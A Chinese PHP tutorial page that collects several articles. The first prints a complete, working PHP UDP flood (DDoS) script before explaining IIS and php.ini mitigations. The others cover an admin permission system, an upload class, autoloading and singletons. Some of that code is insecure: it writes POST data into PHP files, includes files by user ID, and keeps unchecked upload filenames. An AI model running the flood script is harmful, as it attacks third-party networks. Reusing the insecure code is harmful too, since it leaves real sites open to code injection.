您的位置:首页 > 编程技术 > php  >  iis防止php ddos占完网络带宽与服务器资源解决方法

iis防止php ddos占完网络带宽与服务器资源解决方法

 更新时间:2016年11月25日 16:23  点击:1563
用PHP代码调用sockets,直接用服务器的网络攻击别的IP,以前我在apache下有碰到这样的问题,今天我们讲讲述一下关于在iis防止php ddos占完网络带宽与服务器资源的处理办法。

php ddos的常见代码如下:

 代码如下 复制代码

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET['time'];

$time = time();
print "Flooded: $ip on port $rand

";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:

在c:windowsphp.ini里设其值为Off

 代码如下 复制代码

allow_url_fopen = Off

并且:

 代码如下 复制代码

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

然后:

 代码如下 复制代码

; ignore_user_abort = On

前面的;号要去掉

然后重启IIS

如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.

注:如果你的服务器不要运行机制php可以关闭,如果需要的话可以把php_sockets.dll 给禁止,还有一种办法就是把udp端口全部封了,只要80等一些重要的端口开放就可以了。

网站开发少不了有网站后台,有了后台自然要对用户有同角色来分配一下,特别是多用户系统的情况下,如我一个系统要有多个管理员,那么我这些管理要分成,编辑,友情连接,管理员等,那我们要有权限和角色分配,今天我们就来看我以前做的一个系统吧。

先介绍一下文件,

adminconfig.php 这是后台系统中所有文件权限配置。

fun.php 这是一个功能函数

left.php 网站后台根据用户登录的ID来加载相对应的功能菜单

op.php 调用adminconfig.php 默认权限文件

opsava.php  保存用户权限成一个php文件

好了我们先来看看 fun.php文件吧。

 代码如下 复制代码

<?
function findsub($keys ,$userid='abc' ) //此函数重要就是为了调用用户的权限信息
{
 include('user/'.$userid.'.php'); 
 foreach($bb as $key=>$submenu)
 {    
  foreach($submenu  as $subkey=>$menuitem)
  {
   if( $subkey == $keys )
   {
    return 1;    
   }
  }  
 }
}

//下面为生成用户的php权限文件
//写入
function cache_write($name, $var, $values) {
 $cachefile = 'op/user/'.$name.'.php';
 $cachetext = "<?phprn".'$'.$var.'='.arrayeval($values)."rn?>";
 if(!swritefile($cachefile, $cachetext))
 {
  exit("File: $cachefile write error.");
 }
}

//数组转换成字串
function arrayeval($array, $level = 0) {
$space = '';
 for($i = 0; $i <= $level; $i++) {
  $space .= "t";
 }
$evaluate = "Arrayn$space(n";
$comma = $space;
 foreach($array as $key => $val) {
  $key = is_string($key) ? '''.addcslashes($key, ''\').''' : $key;
  $val = !is_array($val) && (!preg_match("/^-?d+$/", $val) || strlen($val) > 12) ? '''.addcslashes($val, ''\').''' : $val;
  if(is_array($val)) {
   $evaluate .= "$comma$key => ".arrayeval($val, $level + 1);
  } else {
   $evaluate .= "$comma$key => $val";
  }
   $comma = ",n$space";
 }
  $evaluate .= "n$space)";
  return $evaluate;
}

//写入文件
function swritefile($filename, $writetext, $openmod='w') {
 if(@$fp = fopen($filename, $openmod)) {
  flock($fp, 2);
  fwrite($fp, $writetext);
  fclose($fp);
  return true;
 } else {
  exit("File: $filename write error.");
  return false;
 }
}

?>

adminconfig.php 后台权限配置文件,以一个数组形式保存

 代码如下 复制代码

<?
$menus = array(
 
  'news' => array(
   'caption'=>'资讯管理',
   'icon'=>'admin/icon_15.gif',
   'sub' => array(
    'newsaddtype' => array('caption' => '分类增加', 'url' => 'news/addtype.php'),
    'newstypemange' => array('caption' => '分类管理', 'url' => 'news/typemange.php'),    
    'newsnewsend' => array('caption' => '发布资讯', 'url' => 'news/newsend.php'),
    'newsnewmange' => array('caption' => '资讯管理', 'url' => 'news/newmange.php'),
    'newscomments' => array('caption' => '评论管理', 'url' => 'news/comments.php'),
    
   ),
  ),
  
  'ask' => array(
   'caption'=>'问卷调查',
   'icon'=>'admin/icon_15.gif',
   'sub' => array(
    'voteadmin_subject_add' => array('caption' => '添加投票主题', 'url' => 'vote/admin_subject_add.php'),
    'voteadmin_subject' => array('caption' => '管理投票主题', 'url' => 'vote/admin_subject.php'),
    'voteadmin_title_add' => array('caption' => '添加投票问题', 'url' => 'vote/admin_title_add.php'),
    'voteadmin_title' => array('caption' => '管理投票问题', 'url' => 'vote/admin_title.php'),
    'voteadmin_question_add' => array('caption' => '添加投票答案', 'url' => 'vote/admin_question_add.php'),
    'voteadmin_question' => array('caption' => '管理投票答案', 'url' => 'vote/admin_question.php'),
    'voteadmin_system' => array('caption' => '投票初始配置', 'url' => 'vote/admin_system.php')
   ),
  ),
  'ads' => array(
   'caption'=>'广告管理',
   'icon'=>'admin/icon_15.gif',
   'sub' => array(
    'ada' => array('caption' => '增加广告', 'url' => 'ada.php'),
    'adm' => array('caption' => '广告管理', 'url' => 'adm.php'),   
    'flashadd' => array('caption' => '焦点图广告增加', 'url' => 'flashadd.php'),
    'flashad' => array('caption' => '焦点图广告管理', 'url' => 'flashad.php')
   ),
  ), 
  
  
  'mange' => array(
   'caption'=>'系统管理员',
   'icon'=>'admin/icon_15.gif',
   'sub' => array(
    'adminuser' => array('caption' => '管理员添加', 'url' => 'adminuser.php'),
    'modpass' => array('caption' => '密码修改', 'url' => 'modpass.php')    
   ),
  ),
 );
?>

left.php文件很简单就是根据用户登录后ID读出权限

 代码如下 复制代码

<?
$userid = $_SESSION['adminid'];
include("op/admincofig.php");
include("op/user/".$userid.".php");

foreach($bb as $key=>$submenu)
{    
 echo "<tr><td  bgcolor="#D879A7" style="line-height:22px;text-align:center;color:#ffffff;"> nr <font color="#EA6A8D" face="Webdings"></font><b>".$menus[$key]['caption']."</b><br /></td></tr> nr <tr ><td bgcolor="F5E8F1">";
 foreach($submenu  as $subkey=>$menuitem)
 {
  $tmparr = explode("|",$menuitem);
  echo "<font color="#EA6A8D" face="Webdings">4</font><a href='".$tmparr[1]."' target="mainframe">".$tmparr[0]."</a><br> nr";
 }
 echo "</td></tr> nr "; 
}

如图

op.php这个文件就是要调用我们的adminconfig.php文件,然后利用fun.php文件中函数把提供过来的数据保存成数组如图

点击保存我们调用了opsava.php 文件,代码如下

 代码如下 复制代码

<?
include("op/fun.php");
if( $_POST )
{
 $sarray =  $_POST ;
 cache_write($userid,'bb',$sarray);//写入缓存
 echo "<script>alert('编辑保存成功!');location='op.php?userid=".$userid."';</script>";

}
?>

保存成功后文件内容如

 代码如下 复制代码

<?php
$bb=Array
 (
 'member' => Array
  (
  'user_search' => '会员升级管理|user_search.php'
  ),
 'membercy' => Array
  (
  'cyuser_search' => '会员升级管理|cyuser_search.php',
  'cyuser_search5' => '交友会员|cyuser_search.php?grade=5'
  ),
 'userid' => 7,
 'button' => '保存编辑'
 )
?>

这样的话我们的left只要加载 7.php文件就只会显示这里在的文件,这样一个基本的后台权限就完成了。

原站原创教程转载注明来源:http://www.111cn.net/phper/php.html

本文章来介绍一下关于文件上传的方法,一个利用了php iframe来实现上传这个也是无刷新的哦,有需要的同学可以参考一下下哈。

首先ajax不能上传文件,这误导了我有段时间,今晚睡不着就照着说明做了个无刷新上传文件

其实原理很简单

 代码如下 复制代码

<form enctype="multipart/form-data" method="POST" target="upload" action="http://localhost/class.upload.php" >
          <input type="file" name="uploadfile" />
          <input type="submit" />
</form>
<iframe name="upload" style="display:none"></iframe>


和一般的<form>标签相比多了一个target属性罢了,用于指定标签页在哪里打开以及提交数据。

如果没有设置该属性,就会像平常一样在本页重定向打开action中的url。

而如果设置为iframe的name值,即"upload"的话,就会在该iframe内打开,因为CSS设置为隐藏,因而不会有任何动静。若将display:none去掉,还会看到服务器的返回信息。

另外贴一下自己组织的类。

 代码如下 复制代码

class upload
{
   public $_file;

   public function __construct( $name =null)
   {
       if(is_null($name) || !isset($_FILES[$name]))
            $name = key($_FILES);
           
       if(!isset($_FILES[$name]))
           throw new Exception("并没有文件上传");
          
       $this->_file  = $_FILES[$name];
      
       if(!is_uploaded_file($this->_file['tmp_name']))
            throw new Exception("异常情况");
       if($this->_file['error'] !== 0)
            throw new Exception("错误代码:".$this->_file['error']);    
   }
   public function moveTo( $new_dir)
   {
       $real_dir = $this->checkDir($new_dir);
       return move_uploaded_file($this->_file['tmp_name'], $real_dir.'/'.$this->_file['name']);
   }
   private function checkDir($dir)
   {
       $real_dir = realpath($dir);
       if($real_dir === false)
           throw new Exception("给定目录{$dir}不存在");
       if(!is_writable($real_dir))
           throw new Exception("给定目录{$dir}不可写");
       return $real_dir;
   }

}

调用示例:

 代码如下 复制代码

$inputName =  'uploadfile';
 // 即<input type=“file" name="uploadfile" /> 中的name值,不填也行
$upload = new upload($inputName);
$new_dir = "/www";  // 将文件移动到的路径
$upload->moveTo($new_dir);
本文章详细的以实例来介绍了关于php _autoload自动加载类的用法以及如何使用_autoload来减少程序上的include和require的调用哦。

 在使用PHP的OO模式开发系统时,通常大家习惯上将每个类的实现都存放在一个单独的文件里,这样会很容易实现对类进行复用,同时将来维护时也很便利。这也是OO设计的基本思想之一。在PHP5之前,如果需要使用一个类,只需要直接使用include/require将其包含进来即可
test.class.php

 代码如下 复制代码

<?php
class abc{
function __construct()
{
echo 'www.111cn.net;
}
}
?>

load.php

 代码如下 复制代码
<?php
class LOAD
{
static function loadClass($class_name)
{
$filename = $class_name.".class.php";
if (is_file($filename)) return include_once $filename;
}
}
/**
* 设置对象的自动载入
* spl_autoload_register — Register given function as __autoload() implementation
*/
spl_autoload_register(array('LOAD', 'loadClass'));
$a = new Test();//实现自动加载,很多框架就用这种方法自动加载类
?>

__autoload()
在实际项目中,不可能把所有的类都写在一个 PHP 文件中,当在一个 PHP 文件中需要调用另一个文件中声明的类时,就需要通过 include 把这个文件引入。不过有的时候,在文件众多的项目中,要一一将所需类的文件都 include 进来,一个很大的烦恼是不得不在每个类文件开头写一个长长的包含文件的列表。我们能不能在用到什么类的时候,再把这个类所在的 php 文件导入呢?

为此,PHP 提供了 __autoload() 方法,它会在试图使用尚未被定义的类时自动调用。通过调用此函数,脚本引擎在 PHP 出错失败前有了最后一个机会加载所需的类。

__autoload() 方法接收的一个参数,就是欲加载的类的类名,所以这时候需要类名与文件名对应,如 Person.php ,对应的类名就是 Pserson 。


下面看个完整的实例

 代码如下 复制代码
class ClassA{
public function __construct(){
echo “ClassA load success!”;
}
}
//定义一个类ClassA,文件名为ClassA.php
class ClassA{
public function __construct(){
echo “ClassA load success!”;
}
}
class ClassB extends ClassA {
public function __construct(){
//parent::__construct();
echo “ClassB load success!”;
}
}
//定义一个类ClassB,文件名为ClassB.php,ClassB继承ClassA
class ClassB extends ClassA {
public function __construct(){
//parent::__construct();
echo “ClassB load success!”;
}
}

定义两个测试用的类之后,我们来编写一个含有__autoload()方法的PHP运行程序文件如下:

 代码如下 复制代码

function __autoload($classname){
$classpath=”./”.$classname.'.php';
if(file_exists($classpath)){
require_once($classpath);
}
else{
echo ‘class file'.$classpath.'not found!';
}
}

$newobj = new ClassA();
$newobj = new ClassB();
文章介绍了一个关于discuz X的单件模式原创文章,PPC高亮插件太不友好了,我直接贴txt内容都会有奇奇怪怪问题发生。

X的只要文件开头都有这么一句话

 代码如下 复制代码

$discuz = & discuz_core::instance();
[code language=php]

 

// instance()属于discuz_core类在class_core.php
function &instance() {
static $object;
if(empty($object)) {
  $object = new discuz_core();
}
return $object;
}
[/code]
这里保证单词请求都运用一个discuz_core实例。这里的&写法是为了兼容PHP4的,如果在PHP5中,则可以使用static。
[code language=php]
//这里是单件模式的简单例子。
class PHPig {
private static $v = null;
static function instance() {
  if(self::$v == null) {
   self::$v = new PHPig();
  }
  return self::$v;
}
}
$pig1 = PHPig::instance();
$pig2 = PHPig::instance();
if($pig1 === $pig2) {
echo '同一个对象';
} else {
echo '不是同一个对象';
}
[/code]
[!--infotagslink--]

相关文章

  • php 中file_get_contents超时问题的解决方法

    file_get_contents超时我知道最多的原因就是你机器访问远程机器过慢,导致php脚本超时了,但也有其它很多原因,下面我来总结file_get_contents超时问题的解决方法总结。...2016-11-25

  • HTTP 408错误是什么 HTTP 408错误解决方法

    相信很多站长都遇到过这样一个问题,访问页面时出现408错误,下面一聚教程网将为大家介绍408错误出现的原因以及408错误的解决办法。 HTTP 408错误出现原因: HTT...2017-01-22

  • php抓取网站图片并保存的实现方法

    php如何实现抓取网页图片,相较于手动的粘贴复制,使用小程序要方便快捷多了,喜欢编程的人总会喜欢制作一些简单有用的小软件,最近就参考了网上一个php抓取图片代码,封装了一个php远程抓取图片的类,测试了一下,效果还不错分享...2015-10-30

  • Android子控件超出父控件的范围显示出来方法

    下面我们来看一篇关于Android子控件超出父控件的范围显示出来方法,希望这篇文章能够帮助到各位朋友,有碰到此问题的朋友可以进来看看哦。 <RelativeLayout xmlns:an...2016-10-02

  • ps把文字背景变透明的操作方法

    ps软件是现在非常受大家喜欢的一款软件,有着非常不错的使用功能。这次文章就给大家介绍下ps把文字背景变透明的操作方法,喜欢的一起来看看。 1、使用Photoshop软件...2017-07-06

  • intellij idea快速查看当前类中的所有方法(推荐)

    这篇文章主要介绍了intellij idea快速查看当前类中的所有方法,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下...2020-09-02

  • Mysql select语句设置默认值的方法

    1.在没有设置默认值的情况下: 复制代码 代码如下:SELECT userinfo.id, user_name, role, adm_regionid, region_name , create_timeFROM userinfoLEFT JOIN region ON userinfo.adm_regionid = region.id 结果:...2014-05-31

  • js导出table数据到excel即导出为EXCEL文档的方法

    复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta ht...2013-10-13

  • mysql 批量更新与批量更新多条记录的不同值实现方法

    批量更新mysql更新语句很简单,更新一条数据的某个字段,一般这样写:复制代码 代码如下:UPDATE mytable SET myfield = 'value' WHERE other_field = 'other_value';如果更新同一字段为同一个值,mysql也很简单,修改下where即...2013-10-04

  • js基础知识(公有方法、私有方法、特权方法)

    本文涉及的主题虽然很基础,在许多人看来属于小伎俩,但在JavaScript基础知识中属于一个综合性的话题。这里会涉及到对象属性的封装、原型、构造函数、闭包以及立即执行表达式等知识。公有方法 公有方法就是能被外部访问...2015-11-08

  • ps怎么制作倒影 ps设计倒影的方法

    ps软件是一款非常不错的图片处理软件,有着非常不错的使用效果。这次文章要给大家介绍的是ps怎么制作倒影,一起来看看设计倒影的方法。 用ps怎么做倒影最终效果&#819...2017-07-06

  • PHP 验证码不显示只有一个小红叉的解决方法

    最近想自学PHP ,做了个验证码,但不知道怎么搞的,总出现一个如下图的小红叉,但验证码就是显示不出来,原因如下 未修改之前,出现如下错误; (1)修改步骤如下,原因如下,原因是apache权限没开, (2)点击打开php.int., 搜索extension=ph...2013-10-04

  • c#中分割字符串的几种方法

    单个字符分割 string s="abcdeabcdeabcde"; string[] sArray=s.Split('c'); foreach(string i in sArray) Console.WriteLine(i.ToString()); 输出下面的结果: ab de...2020-06-25

  • 安卓手机wifi打不开修复教程,安卓手机wifi打不开解决方法

    手机wifi打不开?让小编来告诉你如何解决。还不知道的朋友快来看看。 手机wifi是现在生活中最常用的手机功能,但是遇到手机wifi打不开的情况该怎么办呢?如果手机wifi...2016-12-21

  • js控制页面控件隐藏显示的两种方法介绍

    javascript控制页面控件隐藏显示的两种方法,方法的不同之处在于控件隐藏后是否还在页面上占位 方法一: 复制代码 代码如下: document.all["panelsms"].style.visibility="hidden"; document.all["panelsms"].style.visi...2013-10-13

  • 连接MySql速度慢的解决方法(skip-name-resolve)

    最近在Linux服务器上安装MySql5后,本地使用客户端连MySql速度超慢,本地程序连接也超慢。 解决方法:在配置文件my.cnf的[mysqld]下加入skip-name-resolve。原因是默认安装的MySql开启了DNS的反向解析。如果禁用的话就不能...2015-10-21

  • C#方法的总结详解

    本篇文章是对C#方法进行了详细的总结与介绍,需要的朋友参考下...2020-06-25

  • Zend studio文件注释模板设置方法

    步骤:Window -> PHP -> Editor -> Templates,这里可以设置(增、删、改、导入等)管理你的模板。新建文件注释、函数注释、代码块等模板的实例新建模板,分别输入Name、Description、Patterna)文件注释Name: 3cfileDescriptio...2013-10-04

  • EXCEL数据上传到SQL SERVER中的简单实现方法

    EXCEL数据上传到SQL SERVER中的方法需要注意到三点!注意点一:要把EXCEL数据上传到SQL SERVER中必须提前把EXCEL传到服务器上.做法: 在ASP.NET环境中,添加一个FileUpload上传控件后台代码的E.X: 复制代码 代码如下: if...2013-09-23

  • 分享一段php获取linux服务器状态的代码

    简单的php获取linux服务器状态的代码,不多说-直接上函数:复制代码 代码如下:function get_used_status(){ $fp = popen('top -b -n 2 | grep -E "^(Cpu|Mem|Tasks)"',"r");//获取某一时刻系统cpu和内存使用情况 $rs =...2014-05-31